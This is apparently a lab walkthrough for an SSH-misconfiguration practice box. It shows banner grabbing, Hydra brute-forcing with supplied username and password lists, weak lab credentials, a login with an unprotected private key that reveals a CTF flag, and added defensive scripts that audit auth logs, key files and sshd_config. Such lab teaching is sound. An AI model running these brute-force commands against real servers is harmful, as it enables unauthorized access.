# SSH

SSH (Secure Shell) is a network protocol that allows secure remote access to another computer or server over a network. It's widely used for system administration tasks, managing servers, and even transferring files.

When configuring SSH, there are several settings that can be misconfigured, making the server vulnerable to attacks such as brute-forcing, unauthorized login attempts, and privilege escalation. In this guide, we’ll walk through the misconfigurations in SSH we’ve set up on the `EnumLikeAPro` box to help you understand how to enumerate and exploit these issues.

<details>

<summary>usernames.txt</summary>

```
sita
ram
gita
hari
shyam
rita
nabin
sabin
sunita
bikash
anish
sanjay
bimal
rekha
kiran
sagar
binita
dipak
pratik
anita
suman
nisha
priyanka
roshan
sarita
bishal
manoj
sunil
manisha
ramesh
sushil
kushal
ujwal
alok
sweta
nirajan
bijay
krishna
rabin
rajesh
aayush
milan
anil
bina
deepa
ranjana
ruchi
arjun
meena
jyoti
pramod
```

</details>

<details>

<summary>passwords.txt</summary>

```
ram123
sita1234
nepal123
password
gita@2020
shyam@123
abcd1234
nepal2079
admin123
user@123
bikash2023
test1234
hello@123
password1
welcome123
iloveyou
sunita@123
12345678
qwerty
password123
sabin@2020
sanjay123
bishal321
manisha_123
nabin2022
sagar#123
dipak@123
1234abcd
login2023
milan2078
anil123
meena#2020
rajesh@321
suman@1
kiran_1234
ruchi@789
deepa_2077
ujwal@111
bijay#1
toor
arjun_321
ritanepal
sushil123
manoj2020
sweta@456
ramesh2076
alok@pass
sita@nepal
ram1234
hari!123
nirajan_22
roshan_123
jyoti2023
```

</details>

## SSH Banner Grabbing

One of the first things you should do when enumerating SSH is to grab its version and banner. This gives us valuable information about the SSH service running on the target. It can reveal the SSH version, which can sometimes be exploited if the version has known vulnerabilities.

<pre class="language-bash"><code class="lang-bash"><strong>❯ nmap -sV -p22 enumlikeapro.nca
</strong>Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-10 11:51 +0545
Nmap scan report for enumlikeapro.nca (192.168.10.163)
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
</code></pre>

This tells you which SSH version is running, which you can then check against the known vulnerabilities for that release.

### Banner Grabbing with Netcat (nc)

We can also use netcat or nc for banner grabbing:

```bash
❯ nc enumlikeapro.nca 22        
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
```

In real-world environments, exposing too much information like this is a security risk.

## Brute-Forcing SSH Credentials

One of the main misconfigurations is enabling **password authentication** on SSH. This means attackers can try to guess the password for various accounts using brute-force methods.

**Misconfiguration:**

* **PasswordAuthentication yes** (enabled password login)
* **Allow root login**: The root account can also log in via SSH with a password.

**Brute-Force Attack:**\
We can use a tool like **Hydra** to attempt brute-forcing various usernames and passwords:

<pre class="language-bash"><code class="lang-bash"><strong>❯ hydra -l sita -P EnumLikeAPro/passwords.txt ssh://enumlikeapro.nca
</strong>Hydra v9.5 (c) 2023 by van Hauser/THC &#x26; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-10 11:56:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 50 login tries (l:1/p:50), ~4 tries per task
[DATA] attacking ssh://enumlikeapro.nca:22/
[22][ssh] host: enumlikeapro.nca   login: sita   password: sita1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-10 11:56:41
</code></pre>

This command uses a list of possible passwords (wordlist) and tries to brute-force login as the `sita` user. Hydra will try each password and report back once it finds a valid login.

If we don't know which usernames exist on the server, we can supply a username list as well:

<pre class="language-bash"><code class="lang-bash"><strong>❯ hydra -L EnumLikeAPro/usernames.txt -P EnumLikeAPro/passwords.txt ssh://enumlikeapro.nca     
</strong>Hydra v9.5 (c) 2023 by van Hauser/THC &#x26; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-10 12:01:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
-I
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2601 login tries (l:51/p:51), ~163 tries per task
[DATA] attacking ssh://enumlikeapro.nca:22/
[22][ssh] host: enumlikeapro.nca   login: sita   password: sita1234
[22][ssh] host: enumlikeapro.nca   login: gita   password: password
[STATUS] 344.00 tries/min, 344 tries in 00:01h, 2259 to do in 00:07h, 14 active
[STATUS] 287.33 tries/min, 862 tries in 00:03h, 1741 to do in 00:07h, 14 active
[STATUS] 287.86 tries/min, 2015 tries in 00:07h, 588 to do in 00:03h, 14 active
[STATUS] 286.50 tries/min, 2292 tries in 00:08h, 311 to do in 00:02h, 14 active
[STATUS] 282.78 tries/min, 2545 tries in 00:09h, 58 to do in 00:01h, 14 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-10 12:11:13
</code></pre>

This will try all combinations of usernames from `usernames.txt` and passwords from `passwords.txt`. This is a common way of testing for weak SSH login credentials.
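The two Hydra runs above leave a very recognisable trace on the server: a burst of `Failed password` entries from one source address, often against several usernames. The script below is an added example, not part of this page or of any tool it mentions; it reads sshd log lines in the format sshd writes to `/var/log/auth.log` and reports the per-source failure counts, the sources above a threshold, and any successful password login as root. The log lines are constructed to look like the lab box and are not captured data.

```shell
#!/bin/sh
# Added example (not part of the EnumLikeAPro page): the defender's view of the
# Hydra runs above, i.e. spotting a password-guessing burst in sshd's auth log.
# The lines below are constructed to resemble /var/log/auth.log; they are not
# captured from the lab box.

sample_auth_log() {
cat <<'EOF'
May 10 11:56:37 enumlikeapro sshd[2231]: Failed password for sita from 192.168.10.76 port 50112 ssh2
May 10 11:56:37 enumlikeapro sshd[2233]: Failed password for invalid user admin from 192.168.10.76 port 50114 ssh2
May 10 11:56:38 enumlikeapro sshd[2235]: Failed password for sita from 192.168.10.76 port 50116 ssh2
May 10 11:56:38 enumlikeapro sshd[2237]: Failed password for sita from 192.168.10.76 port 50118 ssh2
May 10 11:56:39 enumlikeapro sshd[2239]: Accepted password for sita from 192.168.10.76 port 50120 ssh2
May 10 12:03:10 enumlikeapro sshd[2301]: Failed password for root from 192.168.10.90 port 41022 ssh2
May 10 12:05:02 enumlikeapro sshd[2310]: Accepted publickey for dev from 192.168.10.20 port 39100 ssh2: ED25519 SHA256:constructed
May 10 12:06:15 enumlikeapro sshd[2320]: Accepted password for root from 192.168.10.76 port 50200 ssh2
EOF
}

# failed_logins_by_source: stdin = auth log; prints "<failures> <distinct users> <ip>"
# per source address, most failures first. "invalid user NAME" is normalised to NAME.
failed_logins_by_source() {
    awk '/sshd\[[0-9]+\]: Failed password for / {
            user = ""; ip = ""
            for (i = 1; i <= NF; i++) {
                if ($i == "for")  user = ($(i+1) == "invalid") ? $(i+3) : $(i+1)
                if ($i == "from") ip = $(i+1)
            }
            if (ip == "") next
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END { for (ip in fails) print fails[ip], users[ip], ip }' | sort -rn
}

# flag_sources THRESHOLD: stdin = auth log; prints source IPs with >= THRESHOLD failures
flag_sources() {
    failed_logins_by_source | awk -v t="$1" '$1 >= t { print $3 }'
}

# root_password_logins: stdin = auth log; prints successful password logins as root,
# which only a server with PermitRootLogin yes and password auth can produce
root_password_logins() {
    grep 'sshd\[[0-9]*\]: Accepted password for root from '
}

# Stand-alone run over the constructed sample
sample_auth_log | failed_logins_by_source
sample_auth_log | flag_sources 3
sample_auth_log | root_password_logins
```

Run against the sample, `failed_logins_by_source` reports `4 2 192.168.10.76` (four failures across two usernames, the Hydra signature) and `1 1 192.168.10.90`; `flag_sources 3` names only the first address. Against a real log, pipe `grep sshd /var/log/auth.log` into the functions; the per-source failure count and the distinct-user count together separate a brute-force run from a single user mistyping a password.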

## Weak/Default Credentials

In this setup, we’ve intentionally used weak or default passwords for some user accounts. For example:

* **User `ram`**: Password `ram1234`
* **User `gita`**: Password `password`

These are weak passwords that can be easily cracked with brute-forcing tools. If you look at the password list we created, these passwords are commonly used and are easy for attackers to guess. The Hydra brute-force attack also found these credentials easily. In CTFs, you would generally use a wordlist such as `rockyou.txt`, located at:

<pre class="language-bash"><code class="lang-bash"><strong>❯ locate rockyou.txt           
</strong>/usr/share/wordlist/rockyou.txt
/usr/share/wordlist/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
</code></pre>

## SSH Key-Based Authentication

While passwords are a common attack vector, **SSH keys** offer a more secure way to authenticate. However, we've intentionally misconfigured SSH keys by setting up a user `dev` with an **SSH key** but no **passphrase**, making it easy to misuse.

{% hint style="warning" %}
The private key is somewhere in the file system; if you have been following along from the earlier sections, you will already have come across it.
{% endhint %}

**Misconfiguration:**

* SSH key for `dev` with no passphrase. This allows anyone with access to the private key to log in without any password.

To log in via SSH key-based authentication, you can try using the **private key** for the `dev` user.

{% hint style="success" %}
Before passing `id_rsa` with the `-i` flag, the file must have `600` permissions; SSH refuses to use a private key whose group or other permission bits are set.
{% endhint %}
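Both conditions described above, the `600` requirement and the missing passphrase, can be checked on a key file before it is ever used. The script below is an added example, not part of this page or of OpenSSH. It reads the file's mode from `ls -ld` and recognises an unencrypted key by its format: a legacy PEM key carries a `Proc-Type: 4,ENCRYPTED` header when it is protected, and an `openssh-key-v1` key stores its cipher name in the first bytes of the base64 body, where the cipher name `none` means no passphrase. The key stubs used in the test are constructed headers only, not real keys.

```shell
#!/bin/sh
# Added example, not from the EnumLikeAPro page: audit an SSH private key file
# for the two conditions the section above describes. ssh refuses a key whose
# group/other permission bits are set ("permissions are too open"), and a key
# without a passphrase can be used by anyone who copies the file.

# key_perms_ok FILE -> 0 when the group and other permission bits are all clear
key_perms_ok() {
    # "ls -ld" prints e.g. "-rw-------"; characters 5-10 are the group/other bits
    [ "$(ls -ld "$1" | cut -c5-10)" = "------" ]
}

# key_encryption FILE -> prints "encrypted", "unencrypted" or "unknown"
key_encryption() {
    if grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        # openssh-key-v1 format: the base64 body starts with the magic
        # "openssh-key-v1\0" followed by the cipher name as a length-prefixed
        # string. Magic + cipher name "none" base64-encodes to the prefix below;
        # any other cipher name means the key is passphrase-protected.
        first=$(sed -n '2p' "$1")
        case "$first" in
            b3BlbnNzaC1rZXktdjEAAAAABG5vbmU*) echo unencrypted ;;
            b3BlbnNzaC1rZXktdjEAAAAA*)        echo encrypted ;;
            *)                                echo unknown ;;
        esac
    elif grep -q '^-----BEGIN ENCRYPTED PRIVATE KEY-----' "$1"; then
        echo encrypted                     # PKCS#8 with a passphrase
    elif grep -q '^-----BEGIN .*PRIVATE KEY-----' "$1"; then
        # Legacy PEM (RSA/EC/DSA) and plain PKCS#8: only an encrypted legacy
        # key carries the Proc-Type header
        if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
            echo encrypted
        else
            echo unencrypted
        fi
    else
        echo unknown
    fi
}

# audit_private_key FILE -> prints findings; returns 0 only if both checks pass
audit_private_key() {
    rc=0
    if key_perms_ok "$1"; then
        echo "$1: permissions ok"
    else
        echo "$1: group/other bits set; ssh will reject it (needs mode 600)"
        rc=1
    fi
    case "$(key_encryption "$1")" in
        unencrypted) echo "$1: no passphrase"; rc=1 ;;
        encrypted)   echo "$1: passphrase-protected" ;;
        *)           echo "$1: unrecognised key format"; rc=1 ;;
    esac
    return "$rc"
}

# Usage: audit_private_key ~/.ssh/id_rsa
```

Run over a directory of keys, the audit turns the `dev` misconfiguration into a finding rather than a surprise: a key that reports `no passphrase` is a bearer credential, and anyone who can read the file can log in exactly as the section shows.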

<pre class="language-bash"><code class="lang-bash"><strong>❯ ssh -i ../id_rsa dev@enumlikeapro.nca
</strong>The authenticity of host 'enumlikeapro.nca (192.168.10.163)' can't be established.
ED25519 key fingerprint is SHA256:VRAQnljUgBF9UXWdEqM+ExCK8L0tfz+b0t92QtAmF0w.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:164: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'enumlikeapro.nca' (ED25519) to the list of known hosts.
   / | / / ____/   |     / | / /__  ____  ____ _/ /
  /  |/ / /   / /| |    /  |/ / _ \/ __ \/ __ `/ / 
 / /|  / /___/ ___ |   / /|  /  __/ /_/ / /_/ / /  
/_/ |_/\____/_/  |_|  /_/ |_/\___/ .___/\__,_/_/   

Welcome to the EnumLikeAPro SSH Service!
        -- Powered by ncateam.xyz --

 ▓▒░  Server     : Ubuntu 22.04.5 LTS
 ▓▒░  SSH        : OpenSSH_8.9p1
 ▓▒░  Contact    : admin@enumlikeapro.nca
 ▓▒░  Warning    : Authorized Access Only!
 ▓▒░  Logged IP  : $SSH_CLIENT

╔════════════════════════════════════════════════════╗
║  Unauthorized access is prohibited and monitored.  ║
╚════════════════════════════════════════════════════╝

🎯  FLAG: nca{w3lc0me_2_enumlikeapro}
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat May 10 06:25:01 AM UTC 2025

  System load:             0.12
  Usage of /:              46.4% of 11.21GB
  Memory usage:            9%
  Swap usage:              0%
  Processes:               151
  Users logged in:         1
  IPv4 address for enp0s3: 192.168.10.163
  IPv6 address for enp0s3: 2400:1a00:b050:201d:a00:27ff:fe91:9f64


Expanded Security Maintenance for Applications is not enabled.

55 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

New release '24.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Sat May 10 06:05:15 2025 from 192.168.10.76
dev@enumlikeapro:~$ 
</code></pre>

## Root User Login

By default, most systems disable root login via SSH for security. However, in our setup, we’ve enabled **root login** with a password.

**Misconfiguration:**

* **PermitRootLogin yes**: Root login is allowed via SSH.

This means we can do:

```bash
ssh root@enumlikeapro.nca
```

and, once we have root's password, we get a root shell over SSH.

{% hint style="success" %}
**Your Task**: Use the provided wordlists and find a valid password for the root user.
{% endhint %}
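The two `sshd_config` directives this page relies on, `PasswordAuthentication yes` from the brute-forcing section and `PermitRootLogin yes` from this one, are easy to audit, but only if the audit applies sshd's own rule: keywords are case-insensitive and the first uncommented occurrence of a keyword wins, so a `no` appended at the bottom of the file changes nothing. The script below is an added example, not part of this page or of OpenSSH; the configuration fragments it contains are constructed, not copied from the lab box, and the defaults it assumes when a keyword is absent are the OpenSSH ones (`PermitRootLogin prohibit-password` since OpenSSH 7.0, `PasswordAuthentication yes`).

```shell
#!/bin/sh
# Added example (not the page's or OpenSSH's code): audit an sshd_config for the
# two misconfigurations this page relies on, PasswordAuthentication yes and
# PermitRootLogin yes. sshd keywords are case-insensitive and the FIRST
# occurrence of a keyword wins, so the audit reproduces that rule rather than
# grepping for the last matching line.

# effective_setting FILE KEYWORD -> the value sshd would use: the first
# uncommented occurrence before any Match block, else the OpenSSH default
effective_setting() {
    value=$(awk -v key="$2" '
        /^[[:space:]]*#/ { next }                    # comment line
        tolower($1) == "match" { exit }              # conditional section: stop
        tolower($1) == tolower(key) { print $2; exit }
    ' "$1")
    if [ -z "$value" ]; then
        case "$(printf '%s' "$2" | tr 'A-Z' 'a-z')" in
            permitrootlogin)        value=prohibit-password ;;   # default since OpenSSH 7.0
            passwordauthentication) value=yes ;;
            pubkeyauthentication)   value=yes ;;
        esac
    fi
    printf '%s\n' "$value"
}

# audit_sshd_config FILE -> prints one finding per setting; returns 1 if any is weak
audit_sshd_config() {
    rc=0
    pw=$(effective_setting "$1" PasswordAuthentication)
    root=$(effective_setting "$1" PermitRootLogin)
    if [ "$pw" = yes ]; then
        echo "WEAK: PasswordAuthentication yes (accounts can be brute-forced)"; rc=1
    else
        echo "OK:   PasswordAuthentication $pw"
    fi
    if [ "$root" = yes ]; then
        echo "WEAK: PermitRootLogin yes (root reachable with a password)"; rc=1
    else
        echo "OK:   PermitRootLogin $root"
    fi
    return "$rc"
}

# Constructed fragments, not copied from the lab box. The weak one also shows
# the classic trap: a "no" appended later does not override the earlier "yes".
weak_config() {
cat <<'EOF'
Port 22
PasswordAuthentication yes
PermitRootLogin yes
# appended by an admin who thought this fixed it:
PasswordAuthentication no
EOF
}

hardened_config() {
cat <<'EOF'
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
EOF
}

# Usage: audit_sshd_config /etc/ssh/sshd_config
```

On Ubuntu the main file usually starts with an `Include /etc/ssh/sshd_config.d/*.conf` line, and values from the included files come first, so run the audit over each included file as well; `sshd -T` prints the fully resolved configuration and is the authoritative cross-check.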


